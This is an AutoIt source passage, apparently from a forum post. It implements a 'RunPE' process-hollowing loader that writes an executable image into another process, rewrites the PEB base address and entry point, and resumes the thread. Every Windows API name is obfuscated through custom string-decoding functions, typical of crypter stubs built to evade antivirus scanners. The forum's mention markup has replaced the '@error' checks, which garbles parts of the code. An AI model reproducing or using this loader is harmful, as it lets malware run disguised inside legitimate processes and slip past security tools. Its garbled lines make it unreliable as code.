Local $N313131 = DllStructCreate(ShiftOneLove(Revers('011|131|411|29|14|901|321|021|821|901|14|86|421|421|011|321|901|901|47|711|601|621|521|321|411|59|14|901|321|021|821|901'), 9), $R3130)
; Collect data
Local $F313133 = DllStructGetData($N313131, ShiftOneLove(Revers('811|811|401|711|301|301|86|111|001|021|911|711|801|98'), 3))
Local $S313135 = DllStructGetData($N313131, ShiftOneLove(Revers('201|321|601|48'), 1))
Local $S3734
If $F313133 And $S313135 Then $S3734 = True
If Not $S3734 Then MsgBox(48, ShiftOneLove(Revers('83|801|511|011|511|911|201|29'), 5), ShiftOneLove(Revers('73|97|68|38|19|63|88|38|28|63|39|96|18|63|78|77|67|88|63|88|98|07|63|39|68|88|63|08|08|77|19|63|77|63|05|37|08|98|27|38|18|63|37|08|07|96|88|96|17|38|08|37|68|63|88|38|28'), 4)) ; nothing can be done here
; Move pointer
$R3130 += 88 ; size of the structures before IMAGE_SECTION_HEADER (16 of them).
;#region 6. ALLOCATE 'NEW' MEMORY SPACE
Local $I313233
Local $C313234
If $S3734 Then ; If the module can be relocated then allocate memory anywhere possible
$C313234 = _RunBinary_AllocateExeSpace($N3230, $H313035)
; In case of failure try at original address
If [MENTION=8708]error[/MENTION] Then
$C313234 = _RunBinary_AllocateExeSpaceAtAddress($N3230, $M313033, $H313035)
If [MENTION=8708]error[/MENTION] Then
_RunBinary_UnmapViewOfSection($N3230, $M313033)
; Try now
$C313234 = _RunBinary_AllocateExeSpaceAtAddress($N3230, $M313033, $H313035)
If [MENTION=8708]error[/MENTION] Then
; Return special error number:
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(101, 1, 0)
EndIf
EndIf
EndIf
$I313233 = True
Else ; And if not try where it should be
$C313234 = _RunBinary_AllocateExeSpaceAtAddress($N3230, $M313033, $H313035)
If [MENTION=8708]error[/MENTION] Then
_RunBinary_UnmapViewOfSection($N3230, $M313033)
; Try now
$C313234 = _RunBinary_AllocateExeSpaceAtAddress($N3230, $M313033, $H313035)
If [MENTION=8708]error[/MENTION] Then
; Return special error number:
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(101, 0, 0)
EndIf
EndIf
EndIf
; If there is new ImageBase value, save it
DllStructSetData($C3833, ShiftOneLove(Revers('601|021|201|17|601|801|201|411|87'), 5), $C313234)
;#region 7. CONSTRUCT THE NEW MODULE
; Allocate enough space (in our space) for the new module
Local $R313534 = DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & $H313035 & ShiftOneLove(Revers('69'), 3))
; Get pointer
Local $Z313536 = DllStructGetPtr($R313534)
; Headers
Local $D313538 = DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & $S313031 & ShiftOneLove(Revers('69'), 3), $N3536)
; Write headers to $R313534
DllStructSetData($R313534, 1, DllStructGetData($D313538, 1))
; Write sections now. $R3130 is currently in place of sections
Local $T313635
Local $Z313636, $T313637
Local $L313638, $B313639
Local $M313730
; Loop through sections
For $M313731 = 1 To $N3735
$T313635 = DllStructCreate(ShiftOneLove(Revers('76|101|46|99|901|711|501|68|04|221|501|211|701'), 8) & _
ShiftOneLove(Revers('06|611|611|201|511|101|101|66|901|89|001|601|611|221|501|18|101|111|66|201|321|601|48|901|89|811|711|511|601|78|301|08|111|211|601|111|68|33|101|511|211|021|101'), 1) & _
ShiftOneLove(Revers('76|321|321|901|221|801|801|37|611|501|521|421|221|311|49|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('16|99|811|99|07|121|99|48|401|18|301|421|701|58|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('56|301|221|301|47|521|301|88|711|09|021|701|221|611|111|711|68|83|601|021|711|521|601'), 6) & _
ShiftOneLove(Revers('86|421|911|021|411|521|601|801|021|711|011|19|021|39|321|011|521|911|411|021|98|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('26|811|711|401|101|211|021|311|401|311|801|97|411|78|711|401|911|311|801|411|38|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('46|021|511|611|011|121|201|401|611|311|601|78|701|48|911|601|301|411|221|38|73|501|911|611|421'), 5) & _
ShiftOneLove(Revers('16|711|611|301|001|111|911|211|301|211|701|87|401|18|611|301|001|111|911|08|43|201|611|311|121'), 2) & _
ShiftOneLove(Revers('421|801|411|521|421|411|321|011|521|801|601|321|601|311|67|14|901|321|021|821|901'), 9), _
$R3130)
; Collect data
$Z313636 = DllStructGetData($T313635, ShiftOneLove(Revers('401|321|401|57|621|401|98|901|68|801|921|211|09'), 7))
$T313637 = $N3536 + DllStructGetData($T313635, ShiftOneLove(Revers('501|421|501|67|721|501|09|911|29|221|901|421|811|311|911|88'), 8))
$L313638 = DllStructGetData($T313635, ShiftOneLove(Revers('811|811|401|711|301|301|86|111|001|021|911|711|801|98'), 3))
$B313639 = DllStructGetData($T313635, ShiftOneLove(Revers('711|711|301|611|201|201|76|011|99|101|701|711|321|601|28|201|211|76|301|421|701|58|011|99|911|811|611|701|88|401|18|211|311|701|211|78'), 2))
If $B313639 And $B313639 < $Z313636 Then $Z313636 = $B313639
; If there is data to write, write it
If $Z313636 Then
DllStructSetData(DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & $Z313636 & ShiftOneLove(Revers('69'), 3), $Z313536 + $L313638), 1, DllStructGetData(DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & $Z313636 & ShiftOneLove(Revers('69'), 3), $T313637), 1))
EndIf
; Relocations
If $I313233 Then
If $L313638 <= $F313133 And $L313638 + $Z313636 > $F313133 Then
$M313730 = DllStructCreate(ShiftOneLove(Revers('49|401|911|421|101'), 3) & $S313135 & ShiftOneLove(Revers('69'), 3), $T313637 + ($F313133 - $L313638))
EndIf
EndIf
; Move pointer
$R3130 += 40 ; size of $T313635 structure
Next
; Fix relocations
If $I313233 Then _RunBinary_FixReloc($Z313536, $M313730, $C313234, $M313033, $X3831 = 523)
; Write newly constructed module to allocated space inside the $N3230
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('521|811|511|311|501|18|911|911|501|301|511|811|48|501|021|901|811|19'), 4), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $C313234, _
ShiftOneLove(Revers('711|911|511'), 3), $Z313536, _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), $H313035, _
ShiftOneLove(Revers('25|421|621|221|501|011|421|121|921|011'), 10), 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(7, 0, 0) ; WriteProcessMemory function or call to it while writting new module binary
EndIf
;#region 8. PEB ImageBaseAddress MANIPULATION
; PEB structure definition
Local $D323232 = DllStructCreate(ShiftOneLove(Revers('56|701|501|301|811|98|121|121|701|021|601|601|17|601|701|221|111|021|701|011|611|97|83|701|221|721|401'), 6) & _
ShiftOneLove(Revers('96|521|021|121|511|621|221|98|901|111|031|97|111|811|511|08|111|311|701|911|38|011|701|111|29|24|111|621|131|801'), 10) & _
ShiftOneLove(Revers('36|401|501|701|701|121|201|501|27|701|411|901|501|07|63|501|021|521|201'), 4) & _
ShiftOneLove(Revers('86|011|321|601|121|29|14|011|521|031|701'), 9) & _
ShiftOneLove(Revers('76|421|811|501|421|521|58|04|221|421|021'), 8) & _
ShiftOneLove(Revers('96|521|521|111|421|011|011|57|111|521|701|67|111|311|701|911|38|24|421|621|221'), 10) & _
ShiftOneLove(Revers('76|501|421|501|67|221|901|801|501|911|48|04|221|421|021'), 8) & _
ShiftOneLove(Revers('06|611|511|201|711|201|011|89|511|89|18|611|611|201|001|211|511|18|33|511|711|311'), 1) & _
ShiftOneLove(Revers('16|99|811|99|07|111|301|811|711|321|58|001|911|58|43|611|811|411'), 2) & _
ShiftOneLove(Revers('86|121|601|011|18|421|421|011|801|021|321|98|14|321|521|121'), 9) & _
ShiftOneLove(Revers('46|211|401|611|18|301|601|58|121|021|201|57|73|911|121|711'), 5) & _
ShiftOneLove(Revers('96|111|021|511|621|721|121|29|711|901|121|68|801|111|09|621|521|701|08|24|421|621|221'), 10) & _
ShiftOneLove(Revers('66|801|711|211|321|421|811|98|411|601|811|511|711|29|501|801|78|321|221|401|77|93|121|321|911'), 7) & _
ShiftOneLove(Revers('86|521|911|621|021|67|011|521|601|901|121|49|521|911|011|811|911|021|321|411|721|911|87|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('46|601|311|301|201|98|211|401|201|301|311|311|201|27|311|601|511|911|601|08|73|911|121|711'), 5) & _
ShiftOneLove(Revers('36|411|511|901|021|301|501|78|701|511|08|021|411|501|221|37|63|811|021|611'), 4) & _
ShiftOneLove(Revers('06|401|211|77|711|111|201|911|07|33|511|711|311'), 1) & _
ShiftOneLove(Revers('86|521|421|411|58|011|011|321|97|14|321|521|121'), 9) & _
ShiftOneLove(Revers('86|321|011|521|911|621|021|67|911|021|411|421|911|601|121|921|87|421|711|39|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('26|511|001|211|911|801|96|811|111|78|53|711|911|511'), 3) & _
ShiftOneLove(Revers('26|69|35|49|811|911|801|96|511|001|211|911|801|96|811|111|78|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('66|801|221|401|37|821|121|811|611|801|48|701|801|121|401|111|09|821|511|711|68|701|401|801|98|93|121|321|911'), 7) & _
ShiftOneLove(Revers('36|611|101|501|67|521|811|511|311|501|18|401|501|811|101|801|78|521|211|411|38|401|101|501|68|63|811|021|611'), 4) & _
ShiftOneLove(Revers('16|99|811|99|07|611|301|021|611|301|58|101|701|811|99|811|58|321|011|211|18|201|99|301|48|43|611|811|411'), 2) & _
ShiftOneLove(Revers('86|601|521|601|77|011|211|601|98|011|901|021|67|411|421|911|47|14|321|521|121'), 9) & _
ShiftOneLove(Revers('86|601|521|601|77|011|211|601|98|011|901|021|67|811|011|88|14|321|521|121'), 9) & _
ShiftOneLove(Revers('86|601|521|601|77|011|711|701|601|39|011|421|601|67|011|901|021|801|411|911|49|14|321|521|121'), 9) & _
ShiftOneLove(Revers('66|221|121|811|221|221|801|601|811|121|78|901|68|121|801|501|611|421|58|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('16|501|99|011|27|011|99|001|311|011|37|811|08|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('96|301|26|101|06|111|421|701|221|39|24|111|621|131|801'), 10) & _
ShiftOneLove(Revers('16|811|911|311|301|111|701|68|211|311|701|811|101|301|58|011|99|101|701|811|701|611|96|43|45|65|811|211|701'), 2) & _
ShiftOneLove(Revers('36|501|221|811|501|911|501|68|021|411|501|311|701|501|78|611|101|501|67|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('36|021|901|311|311|511|17|021|411|501|311|701|501|78|611|101|501|67|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('46|501|311|611|901|021|601|911|901|98|601|601|911|57|311|201|121|611|98|121|011|411|411|611|27|601|37|711|201|601|77|73|501|911|611|421|501'), 5) & _
ShiftOneLove(Revers('26|301|111|411|701|811|401|711|701|78|011|201|411|111|96|401|401|711|37|911|801|211|211|411|07|401|17|511|001|401|57|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('96|521|221|701|111|28|211|98|421|111|801|911|721|88|24|011|421|121|921|011'), 10) & _
ShiftOneLove(Revers('36|911|611|101|501|67|601|38|811|501|201|311|121|28|311|121|311|901|421|101|18|63|401|811|511|321|401'), 4) & _
ShiftOneLove(Revers('56|121|811|301|701|87|121|121|701|501|711|021|68|83|021|221|811'), 6) & _
ShiftOneLove(Revers('36|501|211|201|101|88|501|211|401|411|101|67|401|501|811|101|801|78|901|401|57|63|811|021|611'), 4) & _
ShiftOneLove(Revers('76|221|901|021|611|901|08|221|901|421|221|501|421|19|321|321|901|701|911|221|88|04|221|421|021'), 8) & _
ShiftOneLove(Revers('36|021|911|901|08|501|021|121|201|901|811|021|021|96|17|27|901|401|57|63|811|021|611'), 4) & _
ShiftOneLove(Revers('76|511|701|911|48|221|901|801|501|911|48|04|221|421|021'), 8) & _
ShiftOneLove(Revers('56|611|711|111|121|021|701|29|021|711|211|301|38|98|58|83|601|021|711|521|601'), 6) & _
ShiftOneLove(Revers('76|811|911|311|321|221|901|49|221|911|811|311|58|19|78|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('76|221|901|601|711|521|68|801|611|311|521|47|19|78|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('86|901|28|811|321|021|111|521|601|711|98|29|88|14|901|321|021|821|901'), 9) & _
ShiftOneLove(Revers('16|111|301|811|711|321|58|001|911|58|301|501|99|111|57|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('76|811|911|311|321|221|901|49|221|911|411|501|58|711|901|421|321|921|19|601|521|19|901|111|501|711|18|04|801|221|911|721|801'), 8) & _
ShiftOneLove(Revers('26|311|411|801|811|711|401|98|711|411|311|801|08|211|401|911|811|421|68|101|021|68|401|601|001|211|67|53|301|711|411|221|301'), 3) & _
ShiftOneLove(Revers('16|59|45|35|39|611|301|401|401|911|86|301|011|201|211|99|47|701|201|37|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('66|801|711|211|321|421|811|98|321|211|711|08|221|221|801|601|811|121|78|321|221|811|78|93|701|121|811|621|701'), 7) & _
ShiftOneLove(Revers('16|411|99|111|811|701|86|211|311|701|711|211|99|411|221|17|711|011|68|43|201|611|311|121|201'), 2) & _
ShiftOneLove(Revers('36|79|06|45|35|59|911|021|901|07|611|101|311|021|901|07|411|511|901|911|411|101|611|421|37|911|211|88|63|501|021|521|201'), 4) & _
ShiftOneLove(Revers('401|77|411|511|901|911|911|501|78|63|401|811|511|321|401'), 4))
; Fill the structure
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('821|121|811|611|801|48|221|221|801|601|811|121|78|701|401|801|98'), 7), _
ShiftOneLove(Revers('711|911|511'), 3), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $W3438, _ ; pointer to PEB structure
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($D323232), _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), DllStructGetSize($D323232), _
ShiftOneLove(Revers('25|421|621|221|501|011|421|121|921|011'), 10), 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(8, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure
EndIf
; Change base address within PEB
DllStructSetData($D323232, ShiftOneLove(Revers('321|321|901|221|801|801|37|901|321|501|47|901|111|501|711|18'), 8), $C313234)
; Write the changes
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('521|811|511|311|501|18|911|911|501|301|511|811|48|501|021|901|811|19'), 4), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $W3438, _
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($D323232), _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), DllStructGetSize($D323232), _
ShiftOneLove(Revers('25|421|621|221|501|011|421|121|921|011'), 10), 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(9, 0, 0) ; WriteProcessMemory function or call to it failed while changing base address
EndIf
;#region 9. NEW ENTRY POINT
; Entry point manipulation
Switch $R3237
Case 1
DllStructSetData($A3238, ShiftOneLove(Revers('821|501|77'), 8), $C313234 + $L3939)
Case 2
DllStructSetData($A3238, ShiftOneLove(Revers('821|701|09'), 8), $C313234 + $L3939)
Case 3
; FIXME - Itanium architecture
EndSwitch
;#region 10. SET NEW CONTEXT
; New context:
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('811|221|301|811|211|311|96|201|99|301|611|601|68|811|301|58'), 2), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $O3232, _
ShiftOneLove(Revers('711|911|511'), 3), DllStructGetPtr($A3238))
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(10, 0, 0) ; SetThreadContext function or call to it failed
EndIf
;#region 11. RESUME THREAD
; And that's it!. Continue execution:
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('801|221|911|721|801'), 8), ShiftOneLove(Revers('501|201|601|911|901|98|601|411|221|021|601|78'), 5), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $O3232)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or $J3134[0] = -1 Then
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('321|321|901|701|911|221|88|901|421|501|811|311|711|221|901|29'), 8), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, ShiftOneLove(Revers('801|221|911|721|801'), 8), 0)
Return SetError(11, 0, 0) ; ResumeThread function or call to it failed
EndIf
;#region 12. CLOSE OPEN HANDLES AND RETURN PID
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('501|211|401|411|101|67|501|911|511|211|17'), 4), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230)
DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('501|211|401|411|101|67|501|911|511|211|17'), 4), ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $O3232)
; All went well. Return new PID:
Return DllStructGetData($P3133, ShiftOneLove(Revers('101|47|611|611|201|001|211|511|18'), 1))
EndFunc ;==>_RunBinary
Func _RunBinary_FixReloc($Z313536, $A323637, $V323634, $V323631, $D323632)
Local $G323633 = $V323634 - $V323631 ; dislocation value
Local $A323636 = DllStructGetSize($A323637) ; size of data
Local $O323833 = DllStructGetPtr($A323637) ; addres of the data structure
Local $Z323730, $P323731
Local $L313638, $Q323733, $J323734
Local $P323735, $C323736, $B323737
Local $G323738 = 3 + 7 * $D323632 ; IMAGE_REL_BASED_HIGHLOW = 3 or IMAGE_REL_BASED_DIR64 = 10
While $P323731 < $A323636 ; for all data available
$Z323730 = DllStructCreate(ShiftOneLove(Revers('901|101|311|011|86|401|18|301|421|701|58|43|201|611|311|121|201|43|16|711|711|301|611|201|201|76|011|99|911|811|611|701|88|43|201|611|311|121|201'), 2), $O323833 + $P323731)
$L313638 = DllStructGetData($Z323730, ShiftOneLove(Revers('811|811|401|711|301|301|86|111|001|021|911|711|801|98'), 3))
$Q323733 = DllStructGetData($Z323730, ShiftOneLove(Revers('411|601|811|511|37|901|68|801|921|211|09'), 7))
$J323734 = ($Q323733 - 8) / 2
$P323735 = DllStructCreate(ShiftOneLove(Revers('39|201|611|311|121'), 2) & $J323734 & ShiftOneLove(Revers('69'), 3), DllStructGetPtr($Z323730) + 8)
; Go through all entries
For $M313731 = 1 To $J323734
$C323736 = DllStructGetData($P323735, 1, $M313731)
If BitShift($C323736, 12) = $G323738 Then ; check type
$B323737 = DllStructCreate(ShiftOneLove(Revers('711|911|511'), 3), $Z313536 + $L313638 + BitAND($C323736, 0xFFF)) ; the rest of $C323736 is offset
DllStructSetData($B323737, 1, DllStructGetData($B323737, 1) + $G323633) ; this is what's this all about
EndIf
Next
$P323731 += $Q323733
WEnd
Return 1 ; all OK!
EndFunc ;==>_RunBinary_FixReloc
Func _RunBinary_AllocateExeSpaceAtAddress($N3230, $B333132, $A323636)
; Allocate
Local $J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('711|911|511'), 3), ShiftOneLove(Revers('621|57|501|711|411|411|17|411|301|321|221|021|111|29'), 6), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $B333132, _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), $A323636, _
ShiftOneLove(Revers('801|221|911|721|801'), 8), 0x1000, _ ; MEM_COMMIT
ShiftOneLove(Revers('801|221|911|721|801'), 8), 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then
; Try differently
$J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('711|911|511'), 3), ShiftOneLove(Revers('621|57|501|711|411|411|17|411|301|321|221|021|111|29'), 6), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $B333132, _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), $A323636, _
ShiftOneLove(Revers('801|221|911|721|801'), 8), 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
ShiftOneLove(Revers('801|221|911|721|801'), 8), 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then Return SetError(1, 0, 0) ; Unable to allocate
EndIf
Return $J3134[0]
EndFunc ;==>_RunBinary_AllocateExeSpaceAtAddress
Func _RunBinary_AllocateExeSpace($N3230, $A323636)
; Allocate space
Local $J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('711|911|511'), 3), ShiftOneLove(Revers('621|57|501|711|411|411|17|411|301|321|221|021|111|29'), 6), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), 0, _
ShiftOneLove(Revers('811|021|611|99|401|811|511|321|401'), 4), $A323636, _
ShiftOneLove(Revers('801|221|911|721|801'), 8), 0x3000, _ ; MEM_COMMIT|MEM_RESERVE
ShiftOneLove(Revers('801|221|911|721|801'), 8), 64) ; PAGE_EXECUTE_READWRITE
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then Return SetError(1, 0, 0) ; Unable to allocate
Return $J3134[0]
EndFunc ;==>_RunBinary_AllocateExeSpace
Func _RunBinary_UnmapViewOfSection($N3230, $B333132)
DllCall(ShiftOneLove(Revers('611|611|801|45|611|611|801|421|811'), 8), ShiftOneLove(Revers('221|611|111'), 6), ShiftOneLove(Revers('911|021|411|521|801|011|29|111|88|821|011|411|59|121|601|811|911|49|521|78'), 9), _
ShiftOneLove(Revers('711|911|511'), 3), $N3230, _
ShiftOneLove(Revers('711|911|511'), 3), $B333132)
; Check for errors only
If [MENTION=8708]error[/MENTION] Then Return SetError(1, 0, 0) ; Failure
Return 1
EndFunc ;==>_RunBinary_UnmapViewOfSection
Func _RunBinary_IsWow64Process($N3230)
Local $J3134 = DllCall(ShiftOneLove(Revers('901|901|101|74|15|25|901|201|111|511|201|801'), 1), ShiftOneLove(Revers('111|411|411|101'), 3), ShiftOneLove(Revers('911|911|501|301|511|811|48|65|85|321|511|19|911|77'), 4), _
ShiftOneLove(Revers('301|011|201|211|99|601'), 2), $N3230, _
ShiftOneLove(Revers('54|111|411|411|101'), 3), 0)
; Check for errors or failure
If [MENTION=8708]error[/MENTION] Or Not $J3134[0] Then Return SetError(1, 0, 0) ; Failure
Return $J3134[2]
EndFunc ;==>_RunBinary_IsWow64Process
Func ShiftOneLove($O333431 = "", $M333432 = 1)
Local $H333433 = ""
Local $A333434
$A333434 = StringSplit($O333431, "|")
For $N333437 = 1 To $A333434[0] Step 1
$H333433 &= Chr($A333434[$N333437] - $M333432)
Next
Return $H333433
EndFunc
Func Revers($O333431)
Local $M333535, $Q333536, $J333537
$J333537 = StringLen($O333431)
For $Q333536 = 0 To $J333537
$M333535 = $M333535 & StringMid($O333431, $J333537 - $Q333536, 1)
Next
Return $M333535
EndFunc